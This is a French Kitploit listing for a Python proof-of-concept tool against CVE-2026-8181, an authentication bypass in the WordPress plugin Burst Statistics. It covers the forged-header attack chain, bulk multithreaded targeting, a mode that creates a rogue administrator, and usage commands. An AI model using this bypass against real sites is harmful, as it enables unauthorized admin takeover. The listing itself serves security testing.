Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-8181 — CVE-2026-8181 PoC : contournement de l'authentification de Burst Statistics (3.4.0–3.4.1.1). Outil Python — analyses mono-cible et multi-cibles, workers multithreadés, rapports TXT. Tests autorisés uniquement. Mainteneur : mürrez. | Kitploit
Outils/GitHubGitHub/murrez/cve-2026-8181
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionAuthentification
GitHubmurrez/cve-2026-8181

CVE-2026-8181

CVE-2026-8181 PoC : contournement de l'authentification de Burst Statistics (3.4.0–3.4.1.1). Outil Python — analyses mono-cible et multi-cibles, workers multithreadés, rapports TXT. Tests autorisés uniquement. Mainteneur : mürrez.

Voir le dépôt
38il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Typing intro EN
Typing intro TR
Tagline EN/TR



CVE CVSS WP Python

EN : PoC contrôlé et brèves notes techniques pour tests de sécurité autorisés du contournement d’authentification dans Burst Statistics.

TR : PoC contrôlé et bref résumé technique pour tests de sécurité autorisés du contournement d’authentification dans Burst Statistics.


Aperçu du projet

Anglais

ChampDétail
QuoiContournement d’authentification (CWE-287) dans Burst Statistics : des en-têtes forgés peuvent élever les requêtes REST vers un contexte administrateur complet.
VersionsVulnérables : 3.4.0, 3.4.1, 3.4.1.1 · Utiliser : 3.4.2 ou plus récent
SévéritéCVSS ~9,8 (Critique) ; à distance, sans authentification dans les conditions applicables.
Ce dépôtCVE-2026-8181.py — automatisation de laboratoire : cible unique, liste groupée, pool de threads, sortie TXT sélective.

Remarque : Le chiffre de plus de 200 000 installations actives sur WordPress.org représente la base d’utilisateurs totale du plugin — cela ne signifie pas que chaque site exécute une version vulnérable. L’impact réel nécessite de vérifier version + environnement (HTTP / disponibilité des mots de passe d’application, etc.).

Turc

ChampDétail
QuoiContournement d’authentification (CWE-287) pour Burst Statistics. Des en-têtes personnalisés pour obtenir un contexte administrateur complet dans les requêtes REST.
VersionsTouchées : 3.4.0, 3.4.1, 3.4.1.1 · Recommandé : 3.4.2 et plus
SévéritéCVSS ~9,8 (Critique) ; à distance et sans authentification dans des conditions appropriées.
Ce dépôtCVE-2026-8181.py — automatisation de laboratoire : cible unique, scan de liste, pool de threads, sortie TXT sélective.

Remarque : Le nombre de plus de 200 000 installations actives sur WordPress.org représente la base d’utilisateurs totale du plugin ; cela ne signifie pas que tous les sites exécutent une version vulnérable. Pour l’impact réel, version + environnement (HTTP, compatibilité des mots de passe d’application, etc.) doivent être vérifiés.


Visuels

Anglais

Le Markdown de GitHub n’intègre pas de GIF binaires sans fichier dans le dépôt. Les extraits Typing SVG ci-dessus (CDN) simulent l’animation. Pour ajouter votre propre capture d’écran :

![Lab demo](https://raw.githubusercontent.com/murrez/cve-2026-8181/main/assets/demo.gif)

Turc

Le Markdown de GitHub ne prend pas en charge l’intégration de GIF sans fichier dans le dépôt. Les extraits Typing SVG ci-dessus (CDN) produisent une animation de texte. Pour votre propre démonstration :

![Lab demo](https://raw.githubusercontent.com/murrez/cve-2026-8181/main/assets/demo.gif)

Chaîne d’attaque (Mermaid)

Anglais — libellés du diagramme

flowchart LR
  A[Client request] --> B[X-BURSTMAINWP: 1]
  A --> C[Authorization: Basic]
  B --> D[plugins_loaded]
  D --> E[is_mainwp_authenticated]
  E --> F{wp_authenticate_application_password == null?}
  F -->|Mis-handled branch| G[get_user_by login]
  G --> H[wp_set_current_user]
  H --> I[REST: full admin context]

Turc — même flux

flowchart LR
  A[İstek] --> B[X-BURSTMAINWP: 1]
  A --> C[Authorization: Basic]
  B --> D[plugins_loaded]
  D --> E[is_mainwp_authenticated]
  E --> F{wp_authenticate_application_password == null?}
  F -->|Yanlış dal| G[get_user_by login]
  G --> H[wp_set_current_user]
  H --> I[REST: tam admin bağlamı]

Fonctionnalités de l’outil

Anglais

FonctionnalitéDescription
Cible unique-u URL de base
Cibles groupées-f targets.txt (une URL par ligne ; les # sont des commentaires)
Parallélisme-j N workers (plafonné)
Fichier combiné-o file.txt — avec -f, seuls les exploits réussis sont ajoutés
Fichiers par hôte--output-dir — seuls les succès obtiennent host.txt (les échecs sont ignorés)
Nouvel admin--create-user — utilisateur aléatoire via REST (le mot de passe apparaît ensuite dans le rapport)
TLS (lab)-k désactive la vérification du certificat (labs de confiance uniquement)

Avec -f, -o et --output-dir s’excluent mutuellement.

Turc

FonctionnalitéDescription
Cible unique-u adresse racine
Cibles multiples-f targets.txt (une URL par ligne ; commentaire #)
Parallélisme-j N workers (plafonné)
Fichier unique-o dosya.txt — avec -f, seul l’exploit réussi est ajouté
Dossier de sortie--output-dir — seuls les succès obtiennent host.txt
Nouvel admin--create-user — utilisateur aléatoire via REST (le mot de passe figure dans le rapport)
TLS (lab)-k désactive la vérification du certificat (labs de confiance uniquement)

En mode -f, -o et --output-dir ne peuvent pas être utilisés ensemble.


Installation

pip3 install requests urllib3

Exemples d’utilisation

Anglais

# Single site, report file
python3 CVE-2026-8181.py -u http://lab.local -U admin -o report.txt -k

# Single site + new admin (lab)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o report.txt -k

# Bulk + combined file (successes only)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o successes.txt -k

# Bulk + per-host files in folder (successes only)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k

Turc

# Tek site, rapor
python3 CVE-2026-8181.py -u http://lab.local -U admin -o sonuc.txt -k
Télécharger l’outil